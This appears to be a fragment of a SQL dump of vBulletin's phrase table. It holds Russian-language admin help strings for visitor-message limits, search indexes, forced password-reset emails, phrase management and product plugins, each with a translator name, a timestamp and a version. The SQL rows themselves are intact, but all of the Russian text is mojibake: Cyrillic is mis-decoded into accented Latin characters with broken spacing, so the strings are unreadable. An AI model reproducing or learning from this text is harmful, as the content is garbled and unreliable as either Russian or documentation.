(23595, -1, 'options_options_usercss_allowed_border_widths_title', 'cphelptext', 'Ãà çðåø¸ÃÃà ÿ øèðèÃà ãðà Ãèö', 'vbulletin', 'zCarot', 1195732662, '3.7.0 Beta 1'),
(23596, -1, 'options_options_vm_maxchars_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ïóáëè÷Ãîì ñîîáùåÃèè. \r\n\r\nÓêà æèòå çäåñü \"0\", ÷òîáû ñÃÿòü îãðà Ãè÷åÃèå.', 'vbulletin', 'zCarot', 1195732727, '3.7.0 Beta 1'),
(23597, -1, 'options_options_vm_maxchars_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ïóáëè÷Ãîì ñîîáùåÃèè', 'vbulletin', 'zCarot', 1195732727, '3.7.0 Beta 1'),
(23598, -1, 'options_options_vm_perpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü çÃà ÷åÃèå ïî óìîë÷à Ãèþ äëÿ êîëè÷åñòâà ïóáëè÷Ãûõ ñîîáùåÃèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå ïðîôèëÿ ïîëüçîâà òåëåé. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955775, '3.7.0 Release Candidate 4'),
(23599, -1, 'options_options_vm_perpage_title', 'cphelptext', 'ÑîîáùåÃèé Ãà ñòðà Ãèöó ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1195732823, '3.7.0 Beta 1'),
(23600, -1, 'options_options_vm_maxperpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì îãðà Ãè÷èòü ìà êñèìà ëüÃîå êîëè÷åñòâî ïóáëè÷Ãûõ ñîîáùåÃèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå ïðîôèëÿ ïîëüçîâà òåëåé. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955784, '3.7.0 Release Candidate 4'),
(23601, -1, 'options_options_vm_maxperpage_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé Ãà ñòðà Ãèöó', 'vbulletin', 'zCarot', 1195732882, '3.7.0 Beta 1'),
(23602, -1, 'options_options_vm_moderation_text', 'cphelptext', 'Åñëè \"Äà \", òî âñå Ãîâûå ïóáëè÷Ãûå ñîîáùåÃèÿ áóäóò îòïðà âëÿòüñÿ Ãà ïðîâåðêó. Äà ÃÃûé ïà ðà ìåòð ìîæåò áûòü âêëþ÷åà Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1195732951, '3.7.0 Beta 1'),
(23603, -1, 'options_options_vm_moderation_title', 'cphelptext', 'Ãðîâåðêà ïóáëè÷Ãûõ ñîîáùåÃèé', 'vbulletin', 'zCarot', 1195732951, '3.7.0 Beta 1'),
(23604, -1, 'options_searchtype_text', 'cphelptext', 'ÃîëÃîòåêñòîâûé ïîèñê èñïîëüçóåò èÃäåêñû ïîèñêà , êîòîðûå âûñòðà èâà åò MySQL ñà ìîñòîÿòåëüÃî, òîãäà êà ê vBulletin èñïîëüçóåò â ñâî¸ì ïîèñêå ñâîè èÃäåêñû.', 'vbulletin', '', 0, ''),
(23605, -1, 'options_searchtype_title', 'cphelptext', 'Òèï ïîèñêà ', 'vbulletin', '', 0, ''),
(23606, -1, 'options_searchtype_deleteindex_text', 'cphelptext', 'Ãðè ïåðåêëþ÷åÃèè Ãà ôîðóìå Ãà ðåæèì ïîëÃîòåêñòîâîãî ïîèñêà âû ìîæåòå ïîæåëà òü óäà ëèòü èÃäåêñû, îñòà âëåÃÃûå îáû÷Ãîé ïîèñêîâîé ìà øèÃîé. Ãòè èÃäåêñû ÃÃ¥ èñïîëüçóþòñÿ ïîëÃîòåêñòîâûì ïîèñêîì è çà Ãèìà þò áîëüøóþ ÷à ñòü âà øåé áà çû äà ÃÃûõ. Âû äîëæÃû áûòü óâåðåÃû, ÷òî ñîáèðà åòåñü ïîñòîÿÃÃî èñïîëüçîâà òü ïîëÃîòåêñòîâûé ïîèñê, ïðåæäå ÷åì óäà ëèòå ýòè èÃäåêñû, òà ê êà ê ïåðåñòðîåÃèå èÃäåêñîâ ìîæåò çà Ãÿòü ìÃîãî âðåìåÃè è äà òü áîëüøóþ Ãà ãðóçêó Ãà ñåðâåð. Äðóãà ÿ ïðè÷èÃà - â òå÷åÃèè ýòîãî âðåìåÃè, êîãäà áóäåò âêëþ÷åÃà îïöèÿ ïîëÃîòåêñòîâîãî ïîèñêà , ýòè èÃäåêñû ÃÃ¥ áóäóò îáÃîâëåÃû Ãîâûìè ñîîáùåÃèÿìè. ÄëèòåëüÃîå èñïîëüçîâà Ãèå ïîëÃîòåêñòîâîãî ïîèñêà ñäåëà åò ýòè èÃäåêñû ÃÃ¥ÃóæÃûìè, è âû âñ¸ ðà âÃî ïîæåëà åòå èõ ïåðåñòðîèòü. \r\n \r\nÂû òà êæå ìîæåòå î÷èñòèòü ýòè èÃäåêñû Ãà ñòðà Ãèöå ÎáÃîâëåÃèå ñ÷¸ò÷èêîâ èç ðà çäåëà Îáñëóæèâà Ãèå . \r\n \r\nÃîñëå ýòîãî âû ìîæåòå ïîæåëà òü îïòèìèçèðîâà òü òà áëèöû postindex è word , äëÿ ýòîãî çà éäèòå â Âîññòà Ãîâèòü/îïòèìèçèðîâà òü òà áëèöû ðà çäåëà Îáñëóæèâà Ãèå .', 'vbulletin', 'zCarot', 1197976864, '3.7.0 Beta 3'),
(23607, -1, 'options_searchtype_deleteindex_title', 'cphelptext', 'Óäà ëèòü èÃäåêñû', 'vbulletin', 'zCarot', 1197976871, '3.7.0 Beta 3'),
(23608, -1, 'passwordcheck_check_do_banned_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè, çà áëîêèðîâà ÃÃûå Ãà âñåãäà , ÃÃ¥ ïîëó÷à ò óâåäîìëåÃèå î ñìåÃÃ¥ èõ ïà ðîëÿ.', 'vbulletin', 'zCarot', 1222100522, '3.8.0 Alpha 2'),
(23609, -1, 'passwordcheck_check_do_banned_title', 'cphelptext', 'Îòïðà âëÿòü çà áëîêèðîâà ÃÃûì Ãà âñåãäà ', 'vbulletin', 'zCarot', 1222100522, '3.8.0 Alpha 2'),
(23610, -1, 'passwordcheck_check_email_text', 'cphelptext', 'Ãòîò òåêñò áóäåò Ãà õîäèòüñÿ â ñîîáùåÃèè, îòïðà âëÿåìîì ïîëüçîâà òåëþ îäÃîâðåìåÃÃî ñ èçìåÃÃ¥Ãèåì åãî ïà ðîëÿ. \r\nÑèìâîëû {username} è {password} â òåêñòå ñîîáùåÃèÿ áóäóò çà ìåÃÃ¥Ãû Ãà çÃà ÷åÃèÿ, ñîîòâåòñòâóþùèå êà æäîìó ïîëüçîâà òåëþ. \r\nÂû äîëæÃû âñòà âèòü ñèìâîë {password} â òåêñò ïèñüìà , èÃà ÷å áóäåò âûâåäåÃî ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1220374566, '3.8.0 Alpha 1'),
(23611, -1, 'passwordcheck_check_email_title', 'cphelptext', 'Òåêñò ïèñüìà ', 'vbulletin', 'zCarot', 1219320401, '3.8.0 Alpha 1'),
(23612, -1, 'passwordcheck_check_email_from_text', 'cphelptext', 'Ââåäèòå à äðåñ ýëåêòðîÃÃîé ïî÷òû, ÷òîáû óêà çà òü îò ÷üåãî èìåÃè áóäóò îòïðà âëÿòüñÿ ïèñüìà .', 'vbulletin', 'zCarot', 1219320459, '3.8.0 Alpha 1'),
(23613, -1, 'passwordcheck_check_email_from_title', 'cphelptext', 'Ãèñüìî îò', 'vbulletin', 'zCarot', 1219320459, '3.8.0 Alpha 1'),
(23614, -1, 'passwordcheck_check_email_subject_text', 'cphelptext', 'Òåìà ïèñüìà , îòîáðà æà åìà ÿ ïîëüçîâà òåëþ.', 'vbulletin', 'zCarot', 1219320185, '3.8.0 Alpha 1'),
(23615, -1, 'passwordcheck_check_email_subject_title', 'cphelptext', 'Òåìà ïèñüìà ', 'vbulletin', 'zCarot', 1219320185, '3.8.0 Alpha 1'),
(23616, -1, 'passwordcheck_check_languageid_text', 'cphelptext', 'Åñëè âû âûáåðèòå çäåñü ÿçûê, òî ïà ðîëè áóäóò èçìåÃÃ¥Ãû òîëüêî ó òåõ ïîëüçîâà òåëåé, êîòîðûå èñïîëüçóþò ýòîò ÿçûê. Ãòî ïîëåçÃî â òåõ ñëó÷à ÿõ, êîãäà Ãà ôîðóìå óñòà ÃîâëåÃî Ãåñêîëüêî ÿçûêîâ, è âû æåëà åòå îòïðà âëÿòü ïèñüìà Ãà òîì ÿçûêå, êîòîðûé èñïîëüçóþò äà ÃÃûå ëþäè.\r\n \r\nÅñëè âû ïðîïóñòèòå ýòîò ïóÃêò, òî áóäóò îáðà áîòà Ãû âñå ïîëüçîâà òåëè, âÃÃ¥ çà âèñèìîñòè îò èñïîëüçóåìîãî èìè ÿçûêà .', 'vbulletin', 'zCarot', 1222102171, '3.8.0 Alpha 2'),
(23617, -1, 'passwordcheck_check_languageid_title', 'cphelptext', 'ÈçìåÃèòü ïà ðîëè ïîëüçîâà òåëåé, èñïîëüçóþùèõ ÿçûê', 'vbulletin', 'zCarot', 1222100372, '3.8.0 Alpha 2'),
(23618, -1, 'passwordcheck_check_period_text', 'cphelptext', 'Âûáðà ÃÃûé çäåñü ïåðèîä áóäåò îãðà Ãè÷èâà òü ó÷¸òÃûå çà ïèñè, êîòîðûì áóäåò èçìåøà ïà ðîëü. Âû ìîæåòå ïîæåëà òü èçìåÃèòü ïà ðîëü òîëüêî Ãà òåõ ó÷¸òÃûõ çà ïèñÿõ, êîòîðûå áûëè Ãåà êòèâÃû ïðîäîëæèòåëüÃîå âðåìÿ.', 'vbulletin', 'zCarot', 1219320514, '3.8.0 Alpha 1'),
(23619, -1, 'passwordcheck_check_period_title', 'cphelptext', 'Ãðîâåðèòü ïîëüçîâà òåëåé ñ ïîñëåäÃåé à êòèâÃîñòüþ', 'vbulletin', 'zCarot', 1219236597, '3.8.0 Alpha 1'),
(23620, -1, 'passwordcheck_check_quantity_text', 'cphelptext', 'Êîëè÷åñòâî ïèñåì, îòïðà âëÿåìûõ çà îäèà ðà ç. Åñëè âû ÃÃ¥ èñïîëüçóéòå ñâîé ëè÷Ãûé ñåðâåð, òî ðåêîìåÃäóåòñÿ óñòà Ãîâèòü çäåñü çÃà ÷åÃèå 100 è ìåÃåå. Äà æå åñëè ó âà ñ ñâîé ñîáñòâåÃÃûé ñåðâåð, ÃÃ¥ ñòîèò óêà çûâà òü çäåñü î÷åÃü áîëüøîå êîëè÷åñòâî, òà ê êà ê âà ñ ìîãóò à âòîìà òè÷åñêè çà áëîêèðîâà òü çà âåðîÿòÃóþ ðà ññûëêó ñïà ìà .', 'vbulletin', 'zCarot', 1219328869, '3.8.0 Alpha 1'),
(23621, -1, 'passwordcheck_check_quantity_title', 'cphelptext', 'Îòïðà âëÿòü ïèñåì çà ðà ç', 'vbulletin', 'zCarot', 1219328869, '3.8.0 Alpha 1'),
(23622, -1, 'passwordcheck_check_reset_on_error_text', 'cphelptext', 'Ãî óìîë÷à Ãèþ åñëè ïðè îòïðà âêå óâåäîìëåÃèÿ ïðîèçîøëà îøèáêà , òî ïà ðîëü ïîëüçîâà òåëÿ ÃÃ¥ áóäåò èçìåøÃ. Åñëè âû óêà æèòå çäåñü \"Äà \", òî ïà ðîëè áóäóò èçìåÃÃ¥Ãû âÃÃ¥ çà âèñèìîñòè îò òîãî, îòïðà âëåÃî ëè óâåäîìëåÃèå îá ýòîì.\r\n \r\nÃà ñòîÿòåëüÃî ðåêîìåÃäóåòñÿ ñÃà ÷à ëà ïîïðîáîâà òü îòïðà âëÿòü óâåäîìëåÃèÿ, ÃÃ¥ ìåÃÿÿ ïà ðîëåé â ñëó÷à å Ãåóäà ÷è. Åñëè æå âû óáåäèòåñü, ÷òî ýòî ïðîáëåìà ÃÃ¥ Ãà ñåðâåðå è òîëüêî Ãåáîëüøîå êîëè÷åñòâî ïîëüçîâà òåëåé îñòà ëîñü áåç èçìåÃÃ¥Ãèé ïà ðîëÿ, òî âû ìîæåòå âêëþ÷èòü ýòó îïöèþ. ÂïîëÃÃ¥ âåðîÿòÃî, ÷òî ïîëüçîâà òåëè óêà çà ëè ÃåâåðÃûé èëè óæå óäà ë¸ÃÃûé à äðåñ ýëåêòðîÃÃîé ïî÷òû.', 'vbulletin', 'zCarot', 1222102193, '3.8.0 Alpha 2'),
(23623, -1, 'passwordcheck_check_reset_on_error_title', 'cphelptext', 'ÈçìåÃÿòü ïà ðîëè, åñëè ïèñüìî ÃÃ¥ îòïðà âëåÃî', 'vbulletin', 'zCarot', 1222100870, '3.8.0 Alpha 2'),
(23624, -1, 'phrase_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nßçûêè \r\nÔðà çû \r\n\r\nÔðà çû: \r\nÑèñòåìà ôðà ç ôîðóìà èñïîëüçóåò øà áëîÃû, ÃÃ¥ çà âèñèìûå îò ÿçûêà . Ôðà çû óêà çûâà þòñÿ äëÿ ëþáûõ ÿçûêîâ, è âñòà âëÿþòñÿ â ÃóæÃûõ ìåñòà õ ôîðóìà Ãà ÃóæÃîì äëÿ ïîëüçîâà òåëÿ ÿçûêå.  øà áëîÃà õ ôðà çû óêà çûâà þòñÿ ïðèìåðÃî òà ê: \r\n\r\n$vbphrase[phrase_identifier] \r\n\r\n äðóãèõ ìåñòà õ ïåðåìåÃÃûõ óêà çûâà þòñÿ òà ê: \r\n\r\n<phrase 1=\"çÃà ÷åÃèå äëÿ ïåðåìåÃÃîé 1\" 2=\"çÃà ÷åÃèå äëÿ ïåðåìåÃÃîé 2\">$vbphrase[phrase_identifier]</phrase> \r\n\r\n ïðèìåðà õ âûøå, ïåðåìåÃÃûå {1} è {2} â ôðà çå \"phrase_identifier\" áóäóò çà ìåùåÃû çÃà ÷åÃèÿìè, óêà çà ÃÃûìè â øà áëîÃÃ¥.', 'vbulletin', 'zCarot', 1205942572, '3.7.0 Release Candidate 1'),
(23625, -1, 'phrase_title', 'cphelptext', 'Î ôðà çà õ', 'vbulletin', '', 0, ''),
(23626, -1, 'phrase_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü Ãîâóþ ôðà çó äëÿ èñïîëüçîâà Ãèÿ â øà áëîÃà õ. Ôðà çû áóäóò âûçûâà òüñÿ èç øà áëîÃîâ âîò òà ê:\r\n$vbphrase[variablename]\r\nãäå variablename - êðà òêîå îïèñà Ãèå ôðà çû.', 'vbulletin', '', 0, ''),
(23627, -1, 'phrase_add_title', 'cphelptext', 'Äîáà âëåÃèå Ãîâîé ôðà çû', 'vbulletin', '', 0, ''),
(23628, -1, 'phrase_add_edit_phrasetypeid_text', 'cphelptext', 'Ãà çäåëåÃèå ôðà ç Ãà òèïû - ýòî èõ óäîáÃà ÿ îðãà Ãèçà öèÿ äëÿ èõ æå ïîñëåäóþùåãî áûñòðîãî ïîèñêà è èçìåÃÃ¥Ãèÿ. Çäåñü åñòü Ãåñêîëüêî âñòðîåÃÃûõ òèïîâ, à òà êæå òèïû, êîòîðûå âû äîáà âèëè. Âûáåðèòå èç ñïèñêà òèï, ê êîòîðîìó îòÃîñèòñÿ âà øà ôðà çà .', 'vbulletin', '', 0, ''),
(23629, -1, 'phrase_add_edit_phrasetypeid_title', 'cphelptext', 'Òèï ôðà ç', 'vbulletin', '', 0, ''),
(23630, -1, 'phrase_add_edit_varname_text', 'cphelptext', 'Èìÿ ïåðåìåÃÃîé - ýòî èìÿ, ñ ïîìîùüþ êîòîðîãî øà áëîÃû ññûëà þòñÿ Ãà ôðà çû. ÃŽÃî ÃÃ¥ äîëæÃî ñîäåðæà òü Ãèêà êèõ ïðîáåëîâ èëè ñïåöèà ëüÃûõ ñèìâîëîâ, òîëüêî ëà òèÃñêèé à ëôà âèò, öèôðû, òèðå è ïîä÷¸ðêèâà Ãèå ( A-Z a-z 0-9 - _ ). \r\n\r\nÄëÿ âûçîâà ôðà çû èç øà áëîÃà , èñïîëüçóéòå \r\n$vbphrase[variablename] \r\nãäå variablename - òî, ÷òî âû ââåëè ñþäà .', 'vbulletin', 'zCarot', 1210067274, '3.7.1'),
(23631, -1, 'phrase_add_edit_varname_title', 'cphelptext', 'Èìÿ ïåðåìåÃÃîé', 'vbulletin', '', 0, ''),
(23632, -1, 'phrase_add_edit_text_text', 'cphelptext', 'Ãòî òåêñò äëÿ âñòà âêè ïî óìîë÷à Ãèþ äëÿ ýòîé ôðà çû. ÃŽÃ ÃÃ¥ áóäåò îòîáðà æà òüñÿ ïîëüçîâà òåëÿì; îÃè óâèäÿò òîëüêî \"ïåðåâåä¸ÃÃóþ\" âåðñèþ. Âû ìîæåòå (ÃÃ¥ îáÿçà òåëüÃî) ââåñòè ïåðåâîä äëÿ êà æäîãî óñòà ÃîâëåÃÃîãî ÿçûêà . Åñëè âû ÃÃ¥ ââåëè ïåðåâîä äëÿ ÿçûêà , òî äëÿ ýòîãî ÿçûêà è ýòîé ôðà çû áóäåò îòîáðà æà òüñÿ ýòîò òåêñò. Âû âñåãäà ìîæåòå äîáà âèòü ïåðåâîä Ãà ëþáîé ÿçûê ïîçæå.', 'vbulletin', '', 0, ''),
(23633, -1, 'phrase_add_edit_text_title', 'cphelptext', 'Òåêñò äëÿ âñòà âêè', 'vbulletin', '', 0, ''),
(23634, -1, 'phrase_delete_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü ýòó ôðà çó. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ ôðà çû. Óäà ëåÃèå ôðà çû óäà ëèò òà êæå âñå å¸ ïåðåâîäû Ãà âñå óñòà ÃîâëåÃÃûå ÿçûêè. Ãòî äåéñòâèå Ãåëüçÿ áóäåò îòìåÃèòü.', 'vbulletin', '', 0, ''),
(23635, -1, 'phrase_delete_title', 'cphelptext', 'Óäà ëåÃèå ôðà çû', 'vbulletin', '', 0, ''),
(23636, -1, 'phrase_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå îòðåäà êòèðîâà òü ñóùåñòâóþùèå ôðà çû, èñïîëüçóåìûå â øà áëîÃà õ. Âû ÃÃ¥ ñìîæåòå èçìåÃèòü èìÿ ïåðåìåÃÃîé èëè òåêñò äëÿ âñòà âêè; âû ìîæåòå èçìåÃèòü òîëüêî ïåðåâîä ôðà çû.', 'vbulletin', '', 0, ''),
(23637, -1, 'phrase_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ôðà çû', 'vbulletin', '', 0, ''),
(23638, -1, 'phrase_edit_languageid_text', 'cphelptext', 'Âûáåðèòå \"ÎÑÃÎÂÃÎÉ ßÇÛÊ\", åñëè âû æåëà åòå, ÷òîáû ýòà ôðà çà áûëà ÷à ñòüþ ÎÑÃÎÂÃÎÃÎ ßÇÛÊÀ ôîðóìà , â ïðîòèâÃîì ñëó÷à å âûáåðèòå \"Äðóãîé ÿçûê\".', 'vbulletin', '', 0, ''),
(23639, -1, 'phrase_edit_languageid_title', 'cphelptext', 'ßçûê', 'vbulletin', '', 0, ''),
(23640, -1, 'phrase_findorphans_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ñîäåðæèòñÿ ñïèñîê âñåõ ôðà ç, ÃÃ¥ ïðèÃà äëåæà ùèõ Ãè îäÃîìó ÿçûêó. Äëÿ êà æäîãî óñòà ÃîâëåÃÃîãî ÿçûêà çäåñü åñòü êîëîÃêà ñ îòìåòêà ìè âèäà \"õ\", êîòîðûå îçÃà ÷à þò, ïåðåâåäåÃà ëè ýòà ôðà çà èëè Ãåò. \r\n\r\nÑ êà æäîé ôðà çîé áåç ÿçûêà âû ìîæåòå ñäåëà òü äâå âåùè - îñòà âèòü èëè óäà ëèòü. Ñîîòâåòñòâóþùèå êÃîïêè Ãà õîäÿòñÿ ñïðà âà . Åñëè âû æåëà åòå ñîõðà Ãèòü èëè óäà ëèòü âñå òà êèå ôðà çû, òî ñîîòâåòñòâóþùèå êÃîïêè Ãà õîäÿòñÿ Ãà âåðõó. Ãà æìèòå êÃîïêó \"ÃðîäîëæåÃèå\" âÃèçó ñòðà Ãèöû, ÷òîáû âûïîëÃèòü âûáðà ÃÃîå äåéñòâèå è ïåðåéòè ê ñëåäóþùèì ôðà çà ì áåç ÿçûêà .', 'vbulletin', '', 0, ''),
(23641, -1, 'phrase_findorphans_title', 'cphelptext', 'Ãà éòè îäèÃî÷Ãûå ôðà çû', 'vbulletin', '', 0, ''),
(23642, -1, 'phrase_findupdates_text', 'cphelptext', 'Ôðà çû ïî óìîë÷à Ãèþ ôîðóìà èÃîãäà èçìåÃÿþòñÿ ïðè îáÃîâëåÃèÿõ. Ãòà ñòðà Ãèöà ïîêà æåò âà ì, êà êèå ôðà çû, èçìåøÃÃûå âà ìè, îáÃîâèëèñü â îðèãèÃà ëüÃîì èñïîëÃÃ¥Ãèè, ÷òîáû âû ìîãëè âÃåñòè ñîîòâåòñòâóþùèå èçìåÃÃ¥Ãèÿ â ñâîè ôðà çû.', 'vbulletin', 'zCarot', 1142601887, '3.6.0 Beta 1'),
(23643, -1, 'phrase_findupdates_title', 'cphelptext', 'Ãà éòè îáÃîâë¸ÃÃûå ôðà çû', 'vbulletin', 'zCarot', 1142601887, '3.6.0 Beta 1'),
(23644, -1, 'phrase_manageorphans_text', 'cphelptext', 'Ãòèì ôðà çà ì òðåáóåòñÿ ÿçûê. Ãèæå Ãà õîäèòñÿ ñïèñîê âñåõ ïåðåâîäîâ äëÿ êà æäîé ôðà çû áåç ÿçûêà . Âà ì ÃóæÃî âûáðà òü îäèà ïåðåâîä äëÿ èñïîëüçîâà Ãèÿ ïî óìîë÷à Ãèþ... çà òåì ýòà ôðà çà áóäåò äîáà âëåÃà ê ÿçûêó.', 'vbulletin', '', 0, ''),
(23645, -1, 'phrase_manageorphans_title', 'cphelptext', 'Óïðà âëåÃèå ôðà çà ìè áåç ÿçûêà ', 'vbulletin', '', 0, ''),
(23646, -1, 'phrase_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ïðîñìîòðåòü ñïèñîê âñåõ ñóùåñòâóþùèõ ôðà ç. Äëÿ êà æäîãî óñòà ÃîâëåÃÃîãî ÿçûêà çäåñü åñòü êîëîÃêà ñ îòìåòêà ìè âèäà \"õ\", êîòîðûå îçÃà ÷à þò, ïåðåâåäåÃà ëè ýòà ôðà çà Ãà ñîîòâåòñòâóþùèé ÿçûê èëè Ãåò. \r\n\r\nÃà æìèòå ñïðà âà îò ÃóæÃîé ôðà çû \"Ãåäà êòèðîâà òü\", ÷òîáû èçìåÃèòü, äîáà âèòü èëè óäà ëèòü ïåðåâîä äëÿ ýòîé ôðà çû. Åñëè ýòî äîïîëÃèòåëüÃà ÿ ôðà çà , òî ïðè ðåäà êòèðîâà Ãèè ïîÿâèòñÿ ññûëêà Ãà å¸ óäà ëåÃèå.', 'vbulletin', '', 0, ''),
(23647, -1, 'phrase_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå ôðà ç', 'vbulletin', '', 0, ''),
(23648, -1, 'phrase_quickref_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì áûñòðî óâèäåòü âñå ôðà çû äëÿ âñåõ ÿçûêîâ. Âûáåðèòå ÿçûê è êà òåãîðèþ ôðà ç â ìåÃþ è Ãà æìèòå êÃîïêó \"Ãðîñìîòðåòü\". ×òîáû óâèäåòü èìÿ ïåðåìåÃÃîé äëÿ êà æäîé ôðà çû è å¸ çÃà ÷åÃèå, ïðîñòî Ãà æìèòå Ãà Ãà çâà Ãèå ôðà çû ñëåâà .', 'vbulletin', '', 0, ''),
(23649, -1, 'phrase_quickref_title', 'cphelptext', 'Ãðîñìîòð ôðà ç', 'vbulletin', '', 0, ''),
(23650, -1, 'phrase_search_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå Ãà éòè îïðåäåëåÃÃóþ ôðà çó. Ãîèñê èä¸ò ïî âñåì ÿçûêà ì.', 'vbulletin', '', 0, ''),
(23651, -1, 'phrase_search_title', 'cphelptext', 'Ãîèñê ôðà ç', 'vbulletin', '', 0, ''),
(23652, -1, 'phrase_search_searchstring_text', 'cphelptext', 'Ãòî òåêñò, êîòîðûé âû æåëà åòå Ãà éòè.', 'vbulletin', '', 0, ''),
(23653, -1, 'phrase_search_searchstring_title', 'cphelptext', 'Ãà éòè ôðà çû, ñîäåðæà ùèå òåêñò', 'vbulletin', '', 0, ''),
(23654, -1, 'phrase_search_languageid_text', 'cphelptext', 'Âûáåðèòå ÿçûê, â êîòîðîì æåëà åòå èñêà òü.', 'vbulletin', '', 0, ''),
(23655, -1, 'phrase_search_languageid_title', 'cphelptext', 'Ãîèñê â ÿçûêå', 'vbulletin', '', 0, ''),
(23656, -1, 'phrase_search_searchwhere_text', 'cphelptext', 'Åñëè âû æåëà åòå èñêà òü òîëüêî â òåêñòà õ ôðà ç, âûáåðèòå \"Òîëüêî òåêñò ôðà ç\". Åñëè âû æåëà åòå èñêà òü òîëüêî ïî èìåÃà ì ïåðåìåÃÃûõ (Ãà ïðèìåð, â $vbphrase[august], august - èìÿ ïåðåìåÃÃîé) âûáåðèòå \"Òîëüêî èìåÃà ïåðåìåÃÃûõ\". Åñëè âû æåëà åòå èñêà òü è òà ì è òà ì, òî âûáåðèòå \"Òåêñò ôðà ç è èìåÃà ïåðåìåÃÃûõ\".', 'vbulletin', '', 0, ''),
(23657, -1, 'phrase_search_searchwhere_title', 'cphelptext', 'Èñêà òü òåêñò â', 'vbulletin', '', 0, ''),
(23658, -1, 'phrase_search_casesensitive_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîèñê áóäåò îñóùåñòâëåà ñ ó÷åòîì ðåãèñòðà .', 'vbulletin', '', 0, ''),
(23659, -1, 'phrase_search_casesensitive_title', 'cphelptext', 'Èñïîëüçîâà òü ðåãèñòðîçà âèñèìûé ïîèñê', 'vbulletin', '', 0, ''),
(23660, -1, 'phrase_search_replacestring_text', 'cphelptext', 'Ãà éäåÃÃûé òåêñò áóäåò çà ìåøà ââåä¸ÃÃûì çäåñü.', 'vbulletin', '', 0, ''),
(23661, -1, 'phrase_search_replacestring_title', 'cphelptext', 'Çà ìåÃà òåêñòîì', 'vbulletin', '', 0, ''),
(23662, -1, 'plugin_productadd_allowoverwrite_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ìîæåò ëè ïðè çà ãðóçêå äà ÃÃîãî ïðîäóêòà ïåðåçà ïèñà òüñÿ à Ãà ëîãè÷Ãûé åìó è óæå óñòà ÃîâëåÃÃûé Ãà ôîðóì ïðîäóêò. Åñëè \"Ãåò\", òî ïðîäóêò ÃÃ¥ áóäåò ïåðåçà ïèñà Ã. Ãòî ñäåëà Ãî, ÷òîáû âû ñëó÷à éÃî ÃÃ¥ ïåðåóñòà Ãîâèëè ïðîäóêò. \r\n \r\nÅñëè æå âû îáÃîâëÿåòå ñóùåñòâóþùèé ïðîäóêò, òî ïðîñòî óêà æåòå çäåñü \"Äà \". ÈçìåøÃÃûå âà ìè Ãà ñòðîéêè, øà áëîÃû è ôðà çû ÃÃ¥ áóäóò çà òðîÃóòû ïðè îáÃîâëåÃèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23663, -1, 'plugin_productadd_allowoverwrite_title', 'cphelptext', 'Ãà çðåøèòü ïåðåçà ïèñü', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23664, -1, 'plugin_productadd_productedit_productid_text', 'cphelptext', 'Óêà æèòå çäåñü óÃèêà ëüÃûé èäåÃòèôèêà òîð âà øåãî ïðîäóêòà . Îà ìîæåò ñîäåðæà òü òîëüêî ñèìâîëû a-z, A-Z, 0-9, è _. Âñå äà ÃÃûå, ñâÿçà ÃÃûå ñ âà øèì ïðîäóêòîì, áóäóò ñîïîñòà âëÿòüñÿ êà ê ðà ç ïî åãî èäåÃòèôèêà òîðó. Ãîñëå ñîçäà Ãèÿ ïðîäóêòà åãî Ãåëüçÿ áóäåò èçìåÃèòü.', 'vbulletin', 'zCarot', 1210067285, '3.7.1'),
(23665, -1, 'plugin_productadd_productedit_productid_title', 'cphelptext', 'ÈäåÃòèôèêà òîð ïðîäóêòà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23666, -1, 'plugin_productadd_productedit_title_text', 'cphelptext', 'Ãà çâà Ãèå ïðîäóêòà . ÃŽÃî áóäåò îòîáðà æåÃî ïîëüçîâà òåëÿì â ñïèñêå óñòà ÃîâëåÃÃûõ ïðîäóêòîâ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23667, -1, 'plugin_productadd_productedit_title_title', 'cphelptext', 'Çà ãîëîâîê ïðîäóêòà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
